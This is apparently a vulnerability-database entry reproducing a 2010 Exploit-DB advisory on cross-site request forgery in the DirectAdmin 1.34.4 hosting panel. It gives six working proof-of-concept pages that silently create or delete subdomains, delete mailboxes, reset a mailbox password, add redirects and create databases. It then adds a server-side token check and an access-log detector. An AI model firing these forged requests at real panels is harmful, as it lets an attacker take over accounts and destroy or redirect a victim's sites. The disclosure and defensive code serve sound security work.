vendor: DirectAdmin
by: K053
CVSS: 3,1 (MEDIUM)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: DirectAdmin
Affected Version From: 1.34.4
Affected Version To: 1.34.4
Patch Exists: NO
Related CWE: N/A
CPE: a:directadmin:directadmin:1.34.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu
Year: 2010

Multi CSRF vulnerability in DirectAdmin (1.34.4)

DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier. Here, three proof-of-concepts (POCs) are listed which can be used to add/delete subdomains and emails. The POCs use a hidden form whose action attribute points at the CMD_SUBDOMAIN or CMD_EMAIL_POP URL and whose hidden action field is set to create or delete; because the panel accepts these requests on the strength of the victim's session cookie alone, a logged-in user who views an attacker-controlled page submits them without noticing. The user must set the proper name instead of selectX: for example, if the subdomain is at position 2 in the list, it should be set to select1.

Mitigation:

The application should ensure that every state-changing request is authenticated and validated before it is acted upon, in particular by requiring a per-session anti-CSRF token that a page on another origin cannot read or supply. State-changing operations should also not be accepted over plain GET requests, since several of the POCs below trigger them with nothing more than an img tag.
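The following is an added example of the server-side check the mitigation describes; it is not DirectAdmin code and not part of the original advisory. It models a request gate in front of the CMD_SUBDOMAIN, CMD_EMAIL_POP, CMD_REDIRECT and CMD_DB endpoints named in the POCs: state changes must arrive by POST, from the panel's own origin, and carry a synchronizer token bound to the session. The session store, the panel origin and the csrf_token field name are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical in-memory session store (session id -> anti-CSRF token).
# DirectAdmin's real session handling is not described on the page.
SESSIONS = {}

# Endpoints named in the advisory whose requests change server state.
STATE_CHANGING_COMMANDS = {"CMD_SUBDOMAIN", "CMD_EMAIL_POP", "CMD_REDIRECT", "CMD_DB"}

# Constructed panel origin; a real deployment would derive this from its configuration.
PANEL_ORIGIN = "https://panel.example:2222"


def issue_csrf_token(session_id):
    """Return the synchronizer token bound to a session, minting it on first use.

    The token is embedded in the panel's own forms; a page on another origin
    cannot read it, so a forged form or img request arrives without it."""
    token = SESSIONS.get(session_id)
    if token is None:
        token = secrets.token_urlsafe(32)
        SESSIONS[session_id] = token
    return token


def header_origin(value):
    """Reduce an Origin or Referer header to scheme://host[:port], or None."""
    if not value:
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None  # covers "null" and malformed values
    return f"{parts.scheme}://{parts.netloc}"


def check_request(method, path, headers, form, session_id):
    """Decide whether a request may act on a state-changing command.

    Returns (allowed, reason). Each rejection corresponds to one of the
    forgery patterns in the advisory: img beacons use GET, and hidden forms
    on a foreign page carry a foreign Origin and no per-session token."""
    command = path.lstrip("/").split("?", 1)[0]
    if command not in STATE_CHANGING_COMMANDS:
        return True, "not a state-changing command"
    if method != "POST":
        return False, "state-changing command via GET"
    origin = header_origin(headers.get("Origin") or headers.get("Referer"))
    if origin != PANEL_ORIGIN:
        return False, "cross-origin request"
    expected = SESSIONS.get(session_id)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    token = issue_csrf_token("demo-session")
    # A GET beacon of the kind shown in poc 4 is refused before any parameter is parsed.
    print(check_request("GET", "/CMD_EMAIL_POP?action=modify&domain=domain_name", {}, {}, "demo-session"))
    # A submission from the panel's own form, carrying the session token, is accepted.
    print(check_request("POST", "/CMD_SUBDOMAIN", {"Origin": PANEL_ORIGIN},
                        {"action": "create", "csrf_token": token}, "demo-session"))
```

The origin check is a second layer rather than a replacement for the token: browsers do not always send Referer, and the token is what makes a request unforgeable, so a request with a matching origin but no valid token is still refused.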

Exploit-DB raw data:

=============================================================================
# Title : Multi CSRF vulnerability in DirectAdmin (1.34.4) 
# Date : 20-3-2010
# Version : 1.34.4
# Author : K053 [K053.Dev0te3 _AT_ gmail]
# Tested on : Ubuntu
# Vendor : http://www.directadmin.com/
# Download : http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a graphical web-based web hosting control panel 
         designed to make administration of websites easier.
-----------------------------------------------------------------------------
>> Here I have listed some PoCs, maybe you find more ;)
-----------------------------------------------------------------------------
# poc 1  : Add Subdomain | 
-------------------------
 <html>
 <head><title>Add subdomain</title></head>
 <body onload="document.forms.info.submit();">
 <form name="info" action="http://address:port/CMD_SUBDOMAIN" method="post">
    <input type="hidden" name="domain" value="domain_name">
    <input type="hidden" name="action" value="create">
    <input type="hidden" name="subdomain" value="test">
    <input type="hidden" value="Submit">
 </form>
 </body>
 </html>
-----------------------------------------------------------------------------
# poc 2 : Delete Subdomain |
---------------------------
 <html>
 <head><title>Delete subdomain</title></head>
 <body onload="document.forms.del.submit();">
 <form name="del" action="http://address:port/CMD_SUBDOMAIN" method="post">
    <input type="hidden" name="domain" value="domain_name">
    <input type="hidden" name="action" value="delete">
    <input type="hidden" name="contents" value="yes">
    <input type="hidden" name="[selectX]" value="subdomain_name">
    <input type="hidden" value="Submit">
 </form>
 </body>
 </html>

Note : You must set the proper name instead of selectX, for example if the test subdomain
       is at number 2 in the list, it should be set to select1.
-----------------------------------------------------------------------------
# poc 3 : Delete Email    |
---------------------------
 <html>
 <head><title>Delete Email</title></head>
 <body onload="document.forms.del.submit();">
 <form name="del" action="http://address:port/CMD_EMAIL_POP" method="post">
    <input type="hidden" name="domain" value="domain_name">
    <input type="hidden" name="action" value="delete">
    <input type="hidden" name="selectx" value="put_mail">
    <input type="hidden" value="Submit">
 </form>
 </body>
 </html>

Note : You must set the proper name instead of selectx, for example if the test mail is at
       number 2 in the list, it should be set to select1.
-----------------------------------------------------------------------------
# poc 4 : Change Email Configuration   |
-----------------------------------
<img src="http://address:port/CMD_EMAIL_POP?action=modify&domain=domain_name&user=username&newuser=username&passwd=mypasswd&passwd2=mypasswd&quota=0&update=Modify">

Note : Able to change quota, password & name
-----------------------------------------------------------------------------
# poc 5 : Set Redirection  |
----------------------------
<img src="http://address:port/CMD_REDIRECT?domain=domain_name&action=add&from=%2F&type=301&to=http://google.com">

Note : Change the from value if you want to set the redirection for a specific path.
-----------------------------------------------------------------------------
# poc 6 : Add Database   |
--------------------------
<img src="http://address:port/CMD_DB?action=create&domain=domain_name&name=b0f&user=b0f&passwd=frenzy&passwd2=frenzy&create=Create">
-----------------------------------------------------------------------------
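For a defender who cannot patch immediately, the PoCs above have a recognisable footprint in the panel's access log: state-changing parameters (action=create/delete/modify/add) arriving over GET, and requests to the CMD_* endpoints whose Referer is another site or absent. The following detection pass over such logs is an added example, not part of the advisory or of DirectAdmin; the log lines are constructed in combined log format, and the panel origin is an assumed value.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in combined log format (not real DirectAdmin logs).
# Line 1 is a legitimate submission from the panel; lines 2-4 mirror the forgery
# patterns in the advisory; line 5 is an ordinary read-only page view.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Mar/2010:10:00:01 +0000] "POST /CMD_SUBDOMAIN HTTP/1.1" 200 512 "https://panel.example:2222/CMD_SUBDOMAIN" "Mozilla/5.0"
203.0.113.5 - - [20/Mar/2010:10:00:09 +0000] "POST /CMD_SUBDOMAIN HTTP/1.1" 200 512 "http://attacker.example/page.html" "Mozilla/5.0"
203.0.113.5 - - [20/Mar/2010:10:00:12 +0000] "GET /CMD_EMAIL_POP?action=modify&domain=domain_name&user=bob&passwd=x&passwd2=x&quota=0 HTTP/1.1" 200 80 "http://attacker.example/page.html" "Mozilla/5.0"
203.0.113.5 - - [20/Mar/2010:10:00:15 +0000] "GET /CMD_REDIRECT?domain=domain_name&action=add&from=%2F&type=301&to=http://google.com HTTP/1.1" 200 80 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Mar/2010:10:00:20 +0000] "GET /CMD_SHOW_DOMAIN?domain=domain_name HTTP/1.1" 200 2048 "https://panel.example:2222/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Endpoints named in the advisory and the action values its PoCs send.
WATCHED_COMMANDS = {"CMD_SUBDOMAIN", "CMD_EMAIL_POP", "CMD_REDIRECT", "CMD_DB"}
MUTATING_ACTIONS = {"create", "delete", "modify", "add"}


def referer_origin(referer):
    """Return scheme://host[:port] of a Referer, or None when it is absent ("-")."""
    if referer in ("", "-"):
        return None
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}"


def find_suspicious(log_text, panel_origin):
    """Return (timestamp, method, command, reasons) for requests matching a CSRF pattern."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        target = urlsplit(m["target"])
        command = target.path.lstrip("/")
        if command not in WATCHED_COMMANDS:
            continue
        action = parse_qs(target.query).get("action", [""])[0]
        origin = referer_origin(m["referer"])
        reasons = []
        if m["method"] == "GET" and action in MUTATING_ACTIONS:
            reasons.append("state change via GET")
        if origin != panel_origin:
            reasons.append("foreign referer" if origin else "no referer")
        if reasons:
            findings.append((m["ts"], m["method"], command, ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG, "https://panel.example:2222"):
        print(*finding, sep=" | ")
```

The "no referer" signal is the noisiest of the three, since browsers and privacy extensions strip Referer for legitimate traffic too; the GET-with-mutating-action signal is the one worth alerting on directly, because the panel's own forms send those actions by POST.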